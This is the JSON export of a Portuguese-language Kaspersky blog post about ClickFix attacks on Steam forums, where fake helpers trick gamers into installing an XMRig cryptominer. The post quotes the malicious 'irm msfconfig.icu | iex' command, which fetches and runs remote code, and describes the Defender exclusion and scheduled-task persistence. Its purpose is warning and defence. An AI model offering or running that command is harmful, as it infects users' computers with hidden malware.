{"id":25265,"date":"2026-08-27T09:00:11","date_gmt":"2026-08-27T12:00:11","guid":{"rendered":"https:\/\/www.kaspersky.com.br\/blog\/?p=25265"},"modified":"2026-08-27T09:47:31","modified_gmt":"2026-08-27T12:47:31","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com.br\/blog\/steam-forum-clickfix-attack-irm-iex\/25265\/","title":{"rendered":"Conselho perigoso para gamers: ClickFix chega aos f\u00f3runs da Steam"},"content":{"rendered":"<p>Este ano, houve uma verdadeira explos\u00e3o de ataques <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">ClickFix<\/a>. O golpe faz tanto sucesso entre os criminosos que mal terminamos de escrever sobre uma variante e j\u00e1 surge outra.<\/p>\n<p>Desta vez, os invasores est\u00e3o de olho nos gamers: jornalistas de tecnologia <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">identificaram publica\u00e7\u00f5es com dicas maliciosas<\/a> nos f\u00f3runs da Steam. Veja como s\u00e3o essas publica\u00e7\u00f5es, qual malware elas ajudam a disseminar e como manter seu dispositivo protegido.<\/p>\n<h2>ClickFix chega aos f\u00f3runs da Steam<\/h2>\n<p>Muitos gamers recorrem a outros jogadores nos f\u00f3runs da Steam em busca de ajuda e dicas para superar uma miss\u00e3o dif\u00edcil, subir de n\u00edvel, conseguir os melhores itens ou contornar um bug. \u00c9 justamente essa confian\u00e7a nas recomenda\u00e7\u00f5es da comunidade que os invasores decidiram explorar.<\/p>\n<p>O ataque come\u00e7a quando criminosos respondem a uma pergunta sobre travamentos no jogo, itens ausentes no invent\u00e1rio ou outros problemas t\u00e9cnicos. Fingindo ser comentaristas prestativos, eles sugerem abrir o PowerShell como administrador e executar um comando que supostamente resolveria o problema do usu\u00e1rio.<\/p>\n<div id=\"attachment_25267\" style=\"width: 1329px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/94\/2026\/08\/25134209\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-25267\" class=\"wp-image-25267 size-full\" title=\"steam-forum-clickfix-attack-irm-iex-1\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/94\/2026\/08\/25134209\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"Publica\u00e7\u00e3o de um agente malicioso em um f\u00f3rum da Steam\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-25267\" class=\"wp-caption-text\">Ao disfar\u00e7ar a publica\u00e7\u00e3o como uma orienta\u00e7\u00e3o para solucionar problemas, o agente malicioso sugere executar o PowerShell como administrador e, em seguida, um comando que supostamente resolveria o problema do usu\u00e1rio. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fonte<\/a><\/p><\/div>\n<p>Como d\u00e1 para imaginar, executar o comando n\u00e3o resolve nada e s\u00f3 cria um problema muito maior. Essa \u00e9 justamente a l\u00f3gica do ClickFix: usar engenharia social para induzir as v\u00edtimas a executar a\u00e7\u00f5es inseguras por conta pr\u00f3pria, fornecendo aos golpistas os meios necess\u00e1rios para comprometer o dispositivo. J\u00e1 abordamos outros truques do ClickFix, como CAPTCHAs falsos, erros de navegador forjados e outros, todos baseados em fazer a pr\u00f3pria v\u00edtima executar o comando malicioso. Voc\u00ea pode saber mais sobre as <a href=\"https:\/\/www.kaspersky.com.br\/blog\/clickfix-attack-variations\/24806\/\" target=\"_blank\" rel=\"noopener\">diferentes varia\u00e7\u00f5es de ataques ClickFix<\/a> em uma postagem anterior.<\/p>\n<p>A ast\u00facia de usar o ClickFix nos f\u00f3runs da Steam \u00e9 que o ataque pode atingir n\u00e3o apenas o jogador que pediu ajuda. Muitos outros gamers que tiverem o mesmo problema e encontrarem a resposta em uma busca no Google tamb\u00e9m podem cair no golpe.<\/p>\n<h2>Entenda rapidamente: o que realmente existe por tr\u00e1s do comando <em>irm <\/em>|<em> iex<\/em><\/h2>\n<p>Antes de explicar o que os invasores realmente induzem os gamers a instalar dessa maneira, \u00e9 importante apresentar um pouco do contexto t\u00e9cnico. Para come\u00e7ar, as publica\u00e7\u00f5es nos f\u00f3runs da Steam orientam as poss\u00edveis v\u00edtimas, sem que elas desconfiem, a executar o seguinte comando no PowerShell:<\/p>\n<p><code> irm msfconfig.icu | iex <\/code><\/p>\n<p>Para quem n\u00e3o conhece o PowerShell em detalhes, essa linha pode parecer bastante inofensiva, pois lembra a inicializa\u00e7\u00e3o do MSConfig, o utilit\u00e1rio de configura\u00e7\u00e3o do sistema integrado ao Windows, com alguns par\u00e2metros adicionais.<\/p>\n<p>Na verdade, est\u00e1 longe de ser inofensiva. Veja o que cada parte desse comando realmente faz:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> \u00e9 a forma abreviada do comando integrado <em>Invoke-RestMethod<\/em> do PowerShell. Acessa o endere\u00e7o da Web indicado mais adiante na linha e recupera os dados retornados.<\/li>\n<li><strong><em>icu<\/em><\/strong> \u00e9 esse endere\u00e7o da Web, e n\u00e3o o nome de um arquivo local, como pode parecer \u00e0 primeira vista. Trata-se do servidor dos invasores, que responde \u00e0 solicita\u00e7\u00e3o <strong><em>irm<\/em><\/strong> com um script malicioso do PowerShell.<\/li>\n<li><strong><em>iex<\/em><\/strong> \u00e9 outro comando integrado do PowerShell, <em>Invoke-Expression<\/em>. Ele recebe o conte\u00fado obtido por <strong><em>irm<\/em><\/strong> nesse endere\u00e7o da Web e o executa como c\u00f3digo do PowerShell.<\/li>\n<\/ol>\n<p>Quando essa linha de c\u00f3digo do PowerShell \u00e9 executada, ela baixa um script do site especificado e o executa imediatamente. Como um usu\u00e1rio do Reddit <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">observou<\/a> corretamente, \u00e9 poss\u00edvel descobrir com seguran\u00e7a qual c\u00f3digo seria baixado para o dispositivo, sem correr o risco de execut\u00e1-lo, simplesmente removendo a segunda parte, <strong><em>iex<\/em><\/strong>. Sem ela, o comando apenas baixa o conte\u00fado do script e o exibe na janela do PowerShell, sem execut\u00e1-lo. Assim, \u00e9 poss\u00edvel ver o c\u00f3digo completo e sem ofusca\u00e7\u00e3o que est\u00e3o pedindo para executar no dispositivo. Agora, vejamos o que esses supostos usu\u00e1rios prestativos dos f\u00f3runs da Steam realmente querem que os gamers instalem em suas m\u00e1quinas.<\/p>\n<h2>Um minerador de criptomoedas, n\u00e3o uma ferramenta de otimiza\u00e7\u00e3o<\/h2>\n<p>Os invasores fizeram a li\u00e7\u00e3o de casa: o script do PowerShell baixado do servidor deles imita de forma convincente um utilit\u00e1rio de otimiza\u00e7\u00e3o do Windows. Ap\u00f3s iniciado, ele exibe notifica\u00e7\u00f5es informando que exclui arquivos tempor\u00e1rios, limpa o cache DNS, atualiza drivers, verifica erros no disco e malware, desativa aplicativos desnecess\u00e1rios na inicializa\u00e7\u00e3o, repara a imagem do Windows e verifica a integridade dos arquivos do sistema.<\/p>\n<div id=\"attachment_25270\" style=\"width: 960px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/94\/2026\/08\/25144351\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-25270\" class=\"wp-image-25270 size-full\" title=\"steam-forum-clickfix-attack-irm-iex-2\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/94\/2026\/08\/25144351\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Falsa otimiza\u00e7\u00e3o do Windows em andamento\" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-25270\" class=\"wp-caption-text\">O script exibe uma sequ\u00eancia de mensagens sobre diversas tarefas falsas de otimiza\u00e7\u00e3o para dar a impress\u00e3o de que est\u00e1 realizando uma manuten\u00e7\u00e3o \u00fatil. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fonte<\/a><\/p><\/div>\n<p>Enquanto isso, a atividade real acontece nos bastidores. Primeiro, o script verifica se est\u00e1 sendo executado com privil\u00e9gios de administrador. Em caso afirmativo, cria uma pasta de trabalho oculta em <em>C:\\Windows\\Background<\/em> e a adiciona \u00e0 lista de exclus\u00f5es do Microsoft Defender. A partir da\u00ed, os arquivos colocados nessa pasta deixam de ser verificados pelo antiv\u00edrus integrado do Windows.<\/p>\n<p>Em seguida, o script prepara o sistema para a pr\u00f3xima etapa do ataque e baixa um arquivo execut\u00e1vel do servidor dos invasores, salvando-o na mesma pasta <em>C:\\Windows\\Background<\/em> com o nome <em>system.exe<\/em>, que parece leg\u00edtimo.<\/p>\n<p>O arquivo baixado \u00e9 o <em>XMRig<\/em>, uma das ferramentas mais populares para minera\u00e7\u00e3o da criptomoeda Monero. O <em>XMRig<\/em> em si n\u00e3o \u00e9 um malware, mas uma ferramenta de minera\u00e7\u00e3o leg\u00edtima e de c\u00f3digo aberto. O problema \u00e9 que os invasores o instalam nos computadores das v\u00edtimas sem o conhecimento delas. Quando est\u00e1 em execu\u00e7\u00e3o, o poder de processamento do dispositivo \u00e9 sequestrado para minerar Monero, e o valor em criptomoedas vai diretamente para os criminosos.<\/p>\n<p>Isso torna os PCs gamers modernos alvos especialmente atraentes: eles contam com CPUs e GPUs potentes, exatamente o tipo de hardware excelente para minera\u00e7\u00e3o de criptomoedas.<\/p>\n<p>Para garantir que o malware continue ativo ap\u00f3s uma reinicializa\u00e7\u00e3o, o script tamb\u00e9m cria uma nova tarefa no Agendador de Tarefas do Windows: <em>XMRig-{computer name}<\/em>. A partir da\u00ed, o minerador de criptomoedas \u00e9 iniciado automaticamente sempre que o sistema \u00e9 ligado.<\/p>\n<h2>Como proteger seu dispositivo contra mineradores de criptomoedas e outros malwares<\/h2>\n<p>Infelizmente, muitos gamers relutam em instalar software de seguran\u00e7a ou mant\u00ea-lo em execu\u00e7\u00e3o em seus dispositivos. O principal motivo \u00e9 o mito persistente de que \u201cum antiv\u00edrus deixa o jogo mais lento\u201d. J\u00e1 abordamos pesquisas sobre isso em nosso blog, e os resultados mostraram que <a href=\"https:\/\/www.kaspersky.com.br\/blog\/tests-gamers-antiviruses\/20972\/\" target=\"_blank\" rel=\"noopener\">n\u00e3o h\u00e1 impacto significativo no desempenho<\/a> ao usar um antiv\u00edrus durante os jogos.<\/p>\n<p>J\u00e1 os mineradores de criptomoedas realmente prejudicam o desempenho e ainda aceleram o desgaste do hardware. Ent\u00e3o, como manter seu PC gamer e suas contas longe de riscos?<\/p>\n<ul>\n<li>Evite executar scripts no PowerShell, Terminal ou outros prompts de comando que pessoas desconhecidas recomendem copiar e executar, seja em f\u00f3runs, chats ou coment\u00e1rios.<\/li>\n<li>Antes de pressionar <em>Enter<\/em> em qualquer comando que voc\u00ea n\u00e3o entenda por completo, pesquise o que ele faz e quais podem ser as consequ\u00eancias de execut\u00e1-lo.<\/li>\n<li>Use uma <a href=\"https:\/\/www.kaspersky.com.br\/premium?icid=br_bb2022-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">solu\u00e7\u00e3o de seguran\u00e7a confi\u00e1vel com modo de jogo<\/a>\u00a0que detecte a tempo tentativas de download de malware e impe\u00e7a sua execu\u00e7\u00e3o.<\/li>\n<li>N\u00e3o desative a <a href=\"https:\/\/www.kaspersky.com.br\/lp\/special-offer-for-gamers?icid=br_bb2023-kdplacehd_acq_ona_smm__all_b2c_blo_lnk____kprem___\" target=\"_blank\" rel=\"noopener\">prote\u00e7\u00e3o<\/a> enquanto joga. O ideal \u00e9 usar uma solu\u00e7\u00e3o com modo de jogo dedicado. <a href=\"https:\/\/www.kaspersky.com.br\/home-security?icid=br_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener\">Os produtos de seguran\u00e7a da Kaspersky<\/a>\u00a0ativam esse modo automaticamente assim que um jogo \u00e9 iniciado, adiando atualiza\u00e7\u00f5es dos bancos de dados de antiv\u00edrus, notifica\u00e7\u00f5es e verifica\u00e7\u00f5es de disco programadas at\u00e9 voc\u00ea terminar de jogar.<\/li>\n<\/ul>\n<blockquote><p>Quer saber de que outras formas os invasores atacam gamers? Confira nossas outras postagens:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Stealka: o novo ladr\u00e3o de dados por tr\u00e1s de cheats, mods e cracks de jogos<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerabilidade no mecanismo de jogos Unity<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Gamers sob ataque: malware em sites oficiais<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Malware Arcane no lugar de cheats do Minecraft<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com.br\/blog\/games-with-trojans-in-steam\/23427\/\" target=\"_blank\" rel=\"noopener\"><strong>Cuidado, jogadores: cavalos de Troia invadiram o Steam<\/strong><\/a><\/li>\n<\/ul>\n<\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"premium-gamer\"><input type=\"hidden\" class=\"placeholder_for_banner\" data-cat_id=\"premium-gamer\" value=\"19875\">\n","protected":false},"excerpt":{"rendered":"<p>Os f\u00f3runs da Steam s\u00e3o o mais novo campo de batalha dos ataques ClickFix. Explicamos como invasores se passam por comentaristas prestativos para induzir gamers a instalar um minerador de criptomoedas em seus PCs.<\/p>\n","protected":false},"author":2726,"featured_media":25266,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1260],"tags":[3366,1288,314,447,2409,385,35,3439,3440,892,230],"class_list":["post-25265","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-criptomoedas","tag-engenharia-social","tag-gamers","tag-jogadores","tag-jogos","tag-malware-2","tag-mineradores-de-criptomoedas","tag-powershell","tag-steam","tag-windows"],"hreflang":[{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/steam-forum-clickfix-attack-irm-iex\/25265\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/13627\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/29435\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/steam-forum-clickfix-attack-irm-iex\/32393\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/steam-forum-clickfix-attack-irm-iex\/14809\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/steam-forum-clickfix-attack-irm-iex\/24214\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com.br\/blog\/tag\/jogadores\/","name":"jogadores"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/posts\/25265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/comments?post=25265"}],"version-history":[{"count":4,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/posts\/25265\/revisions"}],"predecessor-version":[{"id":25274,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/posts\/25265\/revisions\/25274"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/media\/25266"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/media?parent=25265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/categories?post=25265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com.br\/blog\/wp-json\/wp\/v2\/tags?post=25265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}